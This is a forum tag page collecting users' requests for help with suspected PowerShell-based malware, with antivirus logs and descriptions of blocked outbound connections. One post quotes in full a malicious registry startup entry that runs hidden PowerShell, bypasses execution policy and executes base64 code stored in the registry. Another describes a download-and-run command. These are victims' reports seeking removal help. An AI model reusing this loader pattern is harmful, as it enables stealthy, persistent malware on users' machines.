Showing results for tags 'powershell'.

  1. I've been receiving this warning every minute: Malwarebytes www.malwarebytes.com -Detalles del registro- Fecha del evento de protección: 16/5/22 Hora del evento de protección: 13:30 Archivo de registro: 3b6f9f60-d546-11ec-825e-047f0e039c04.json -Información del software- Versión: Versión de los componentes: 1.0.1676 Versión del paquete de actualización: 1.0.55055 Licencia: Premium -Información del sistema- SO: Windows 11 (Build 22000.675) CPU: x64 Sistema de archivos: NTFS Usuario: System -Detalles del sitio web bloqueado- Sitio web malicioso: 1 , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Bloqueado, -1, -1, 0.0.0, , -Datos de sitio web- Categoría: Riskware Dominio: wmail-service.com Dirección IP: Puerto: 80 Tipo: Saliente Archivo: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (end) Could you please help me with this? Thanks
  2. Hey! I, like others, came here with a problem, I got a ...virus? So yesterday I scanned my laptop with Malwarebytes and quarantined all the malware. But today I keep getting notifications saying that: RTP detection, the software was powershell.exe and it was a trojan virus. I had already run a scan with Farbar Recovery Scan Tool, hope you guys can help me out. Sorry for my bad English. FRST.txt Addition.txt
  3. Hi, Good day to all. Four days ago, my PC's Windows Defender/Windows Security detected Trojan:PowerShell/PsInjection.A as a severe threat, example as below: I have scanned through Malwarebytes, but no virus detected. Report as follows: Malwarebytes www.malwarebytes.com -Log Details- Scan Date: 10/10/19 Scan Time: 12:52 PM Log File: d37b26f4-eb19-11e9-a05d-98eecb7ba763.json -Software Information- Version: Components Version: 1.0.627 Update Package Version: 1.0.12833 License: Free -System Information- OS: Windows 10 (Build 18362.418) CPU: x64 File System: NTFS User: DESKTOP-7ICM204\User -Scan Summary- Scan Type: Threat Scan Scan Initiated By: Manual Result: Completed Objects Scanned: 404571 Threats Detected: 0 Threats Quarantined: 0 Time Elapsed: 2 min, 53 sec -Scan Options- Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Detect PUM: Detect -Scan Details- Process: 0 (No malicious items detected) Module: 0 (No malicious items detected) Registry Key: 0 (No malicious items detected) Registry Value: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Data Stream: 0 (No malicious items detected) Folder: 0 (No malicious items detected) File: 0 (No malicious items detected) Physical Sector: 0 (No malicious items detected) WMI: 0 (No malicious items detected) (end) As I have read from the forum, I have downloaded FRST64 and scanned, the FRST.txt and Addition.txt are attached as follows: Addition.txt FRST.txt Hope that anyone can help on this matter. Thanks in advance! Best Regards, SHT
  4. Dear, forum For the last couple of days, I have had a MBAE popup saying it has blocked an exploit attempt on Powershell. It pops up every 20 minutes. I have run RogueKiller, which only found an issue with Hola VPN (which I have now removed). I also tried to turn off Powershell in "Control Panel > Programs and features > Turn Window Features On and OFF". This did not help. I have Windows 10. I use Windows Defender as virus protection. The MBAE build is After reading several posts, it seems to me that there is no one-fix-that-works-for-everyone. So I'm turning to you experts asking if you could please help me. Best regards, Harald
  5. Hello, I have a problem with powershell.exe; it slows down my PC, but I don't know what to do to delete it. Can anybody help me, please? I saw a few topics and I installed FRST64; attached are the logs. Thank you. Addition.txt FRST.txt
  6. Back on August 17, I installed Malwarebytes on my machine since I was having performance issues. The scan found 16 threats on my PC, and removed them as such. Even after this scan though, and several others, Windows Powershell is still performing some suspicious activity. Malwarebytes will occasionally notify me of an outbound connection to "wentz.pw" that Powershell keeps attempting to make. This is classified as "riskware", but I'm concerned since I can't get rid of it. Attached is the log for the most recent connection attempt. blocklog.txt
  7. Every time I restart my PC, I get a notification from Malwarebytes that a 'website was blocked due to malware'. It claims to be an outbound connection affecting the file 'powershell.exe'. The website is f.top4top.net. Malwarebytes identifies this as malware but it is not a program I can remove and I have never visited that website. I'm looking to sort out whatever the issue may be here. The logs can be found below. Malwarebytes www.malwarebytes.com -Log Details- Protection Event Date: 7/8/18 Protection Event Time: 4:25 PM Log File: 137327b6-82ed-11e8-8c03-1c1b0d993f99.json Administrator: Yes -Software Information- Version: Components Version: 1.0.374 Update Package Version: 1.0.5823 License: Trial -System Information- OS: Windows 10 (Build 17134.112) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , , Blocked, [-1], [-1],0.0.0 -Website Data- Category: Malware Domain: f.top4top.net IP Address: Port: [49871] Type: Outbound File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (end)
  8. Hi Malwarebytes support, My Windows 10 was affected by adware/malware and I have used Malwarebytes to remove most of it. However, there's still one malware that can't be removed by Malwarebytes. Whenever I start up my Windows a PowerShell cmd appears for a brief second and disappears. I took a screenshot for your reference (refer to attached). It appears to be a PowerShell command that executes new-object net.webclient.downloadstring(URL). Malwarebytes then detects a malware found at the location c:\windows\winime.exe and quarantines it. Sometimes a myexe.exe malware is also found. Hence I remove it from the quarantine. But that did not fix the problem. Every time I restart my laptop, the PowerShell launches again and Malwarebytes detects the malware again and quarantines it. The process repeats at every startup. It appears that the PowerShell command that was executed at startup causes this. I have no idea how to remove that PowerShell cmd or prevent it from running the command. Please help. Would greatly appreciate your help on this. Malwarebytes did not detect the PowerShell problem. Regards, Dil
  9. I have PowerShell on Windows Server 2008 R2 using 100% CPU and I have attached the files Addition.txt and FRST.txt to help analyze. I hope to get help with this issue. Thank you, Oatstate Addition.txt FRST.txt
  11. I should thank Malwarebytes for removing the ransomware from my PC. Unfortunately, it doesn't fix my computer completely. I read a post so I ran the same thing like it was told. Please help me to analyze my FRST and Addition files reported by Farbar Recovery Tool. What should I do next? Addition.txt FRST.txt
  12. Hi, my name is win. My computer platform is Windows 10. Yesterday my PowerShell started appearing on my taskbar, just popping up before promptly disappearing. I was suspicious but up to date Avast and Malwarebytes scans didn't find anything so I assumed it was just a dodgy Windows update or something. So I ran Farbar Recovery Scan Tool and RogueKiller according to the topic below. I have seen the topic below but I don't know if there is a difference between me and him. So I decided to ask you for your advice. I have attached my results here below. Thank you very much for your kind help. FRST.txt Addition.txt RoKiller.txt
  13. Hi! I'm basically having the same exact problem as this guy: After PowerShell runs, Malwarebytes scans and finds the same three PUPs. I keep deleting them, but PowerShell keeps putting them back on my computer. I don't know what to do about it and I don't want to mess with the registry logs without an expert's assistance. Please Help! The Pup files.txt
  14. So I've posted before about some odd happenings and never really found a solution but think I got a little closer. In my event logs, I have several PowerShell events like pshell console starting a server (among other things), multiple WMI services starting, and browser redirects. Nothing has ever been found by Win defender or MBAM Premium (I really don't feel like they're working - on the surface they seem to be working fine but I think it's an illusion). Hitman Pro did find a file Win32.Droma.abdb (first malicious file I've ever found) and that led me to googling that and found this article. http://niiconsulting.com/checkmate/2014/04/analysis-of-malware-detecting-behavior-anti-reversing-techniques/ ^^Please read! That almost explains my situation to a tee - I've even seen Russian/Chinese sites that will occasionally pop up on Google suspiciously. If you look at my Registry or a Driverquery of my Windows drivers, there are red flags everywhere. As far as I know I'm on the latest update of Win10 but I'm not sure anymore. I was hoping an expert could read the above article and know immediately what's going on or, if not, help me figure it out in order to get rid of it. I've reinstalled Windows after nuking it 5 times. I've been careful about any kind of syncing application (I don't even have Chrome installed) and have reset the sync of any services I do use. I could go on but will stop here and wait for an expert's advice. Should I run FRST? Oh yeah, some programs think I'm on Windows 8 (including MBAM) and I think that's due to registry infection. I would LOVE to get a clean bill of health because this has consumed way too much of my life in the past ~8 months off and on. Thanks in advance! Fingers crossed
  15. Hi, so as the title states, Windows Powershell opens up maybe three or four times a day in the background and then quickly shuts itself down after a second. I haven't really seen any negative side effects from this, but it's starting to get annoying. I have run Malwarebytes scan but it has returned 0 identified threats. Are there any recommended options? Thank you!
  16. Every time I turn on my computer and start doing stuff, a Windows PowerShell cmd pops up for a few seconds and then disappears. I then start running Malwarebytes and I find 5 Potentially Unwanted Programs related to it. I put them in Quarantine and restart, and then everything starts all over again. How do I get rid of whatever PowerShell is doing?
  17. Hi. As stated in the title above, there is a suspicious program I've found in the startup as attached in the startup.txt named "{FB744D93...". I've tried to disable it, and also removing it, but nothing works. It is still there every time upon laptop startup. It started to behave like this after my brother inserted his flash drive into my laptop. There is a topic that is more likely the same (if I'm not mistaken) that was posted yesterday. Thus I have attached all the required files. Thanks in advance! Addition.txt FRST.txt regexport.txt startup.txt
  18. I've got this really annoying problem with powershell.exe, sometimes I can't even access any internet domain and it doesn't let me update the antivirus (ESET). The powershell.exe starts up with Windows and nothing that I did could prevent it from doing so. I've scanned this PC with Malwarebytes, RogueKiller, ZHPCleaner, AdwCleaner, Spyware and Farbar, but none of those found anything, besides RogueKiller, but the files it deleted came back as soon as the PC restarted. I'm truly lost in this one, pls help. Here are the logs from the scans I've run: Addition.txt FRST.txt JRT.txt mrt.log Roguekiller log.txt ZHPCleaner.txt
  19. I wrote a Powershell script that uploads and downloads files through FTP. The script is located on a server, and 5 computers have shortcuts that point to the script. Anti-Exploit is running on all computers and managed through the Management console on the server. One of the computers occasionally blocks this file and identifies it as an exploit. ("Exploit Payload process blocked"). Once the computer is restarted or anti-exploit is restarted, we don't have issues for days at a time. The issue ONLY occurs on this specific computer, and only sporadically.
  20. First time asking for help. For a while (past week or so) now PowerShell pops up for a sec in my taskbar, then Malwarebytes gives me a popup saying that it blocks off some connection from forallshop.info, usually at 12:09 P.M. and 8:09 P.M. It also does this every day, though it has skipped a day once in a while. My primary security is McAfee. I've run Malwarebytes, the Malwarebytes adware cleaner, Anti-rootkit, and Junk Removal tool, I've also run Zemana, Hitmanpro, and Sophos Virus Removal Tool. Any advice?
  21. Hi, I posted something similar a few weeks back but got no response. I think my computer is infected with malware that uses windows powershell to execute. I have Malwarebytes Premium and every now and then it blocks the domain 'tablezip.info'. It's persistent and every time I attempt to scan and remove it, it reappears after a few days and I get pop-ups and malicious adware. Any help removing would be greatly appreciated. Addition.txt FRST.txt
  22. Last week I wasn't able to use my internet banking due to the https certificate not being recognized. At the same time, some websites would not load, and Chrome kept saying I wasn't connected to the internet - which I was, as pages loaded normally on my phone. I reset my router to factory settings and reconfigured the network settings to no avail. It was only then that I found that my LAN is set to a proxy server on Once I unchecked that, everything was fine, but that option gets checked again (with a different port) every time I reboot. As I was snooping around my active processes looking for the issue, I stumbled upon some that I didn't recognize, most notably one called SYS*MY PC NAMETAG*50.EXE, apparently related to PowerShell. It's located in the Java folder under syswow64, but it didn't exist until recently and I haven't updated Java in a while. It also eats up a shitload of memory... There are a few other processes I couldn't recognize, but I figured I should get a full activity log analysed by someone who might be able to pinpoint if there's any malware around. Could you guys please help me out?
  23. I have been having this issue for a while now, powershell exe keeps appearing on my taskbar out of nowhere. Absolutely nothing changes on my screen but I just see it appear and disappear in a few seconds every now and then. I read up online and found scary things like ransomware and locked files and what not, so I decided to try out a bunch of online methods to get rid of it. Initially I had AVAST, but since that wasn't detecting anything I uninstalled it and got the free version of AVG, which detected the powershell exe file trying to connect to a website "camel support" but I couldn't do anything about it, as AVG would prompt every now and then that it stopped PowerShell from connecting to the camel support website but I couldn't find anywhere on the internet how to get rid of it completely. I uninstalled AVG and downloaded Malwarebytes but that did nothing, then I got Bit Defender on a one month full functioning trial, hoping it would find the problem and get rid of it, but Bit Defender is doing exactly what AVG does, it only blocks PowerShell from connecting to Camel Support. Is there any way I could delete PowerShell or re-install or something? I am not computer literate at all, I hope someone here can tell me what's going on and how I can get rid of it. Thank you so much.
  24. So in the past 1-2 months an icon of Windows Powershell appeared randomly and soon after disappeared from my task bar. A few weeks later I started getting Avast warnings that some threat named Camel host had been blocked, so I did a few scans both on Avast and Malwarebytes but nothing came up, then the warning popped up again. Furthermore the "virus" doesn't seem to affect anything and I don't mind removing Windows Powershell if removing it doesn't have any major consequences.
  25. Hey, new user on the malwarebytes forums here. Ok, so I scanned my computer with malwarebytes, and it detected "PUP.Optional.PowerShellSP" And that's ok, I mean it's just one threat right? But I started checking the actual registry key, and this MF is actually running powershell, which runs (binary?) code stored in my registry. Does anyone want to check what the code was doing? Here's the registry entry that malwarebytes detected: "{F119BFAB-D0C9-4E62-9DCF-7923777499B1}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));" I kinda wanted to post this in the "new malware" category, since the registry entry that it executes wasn't detected by malwarebytes, but it did detect the part where it runs.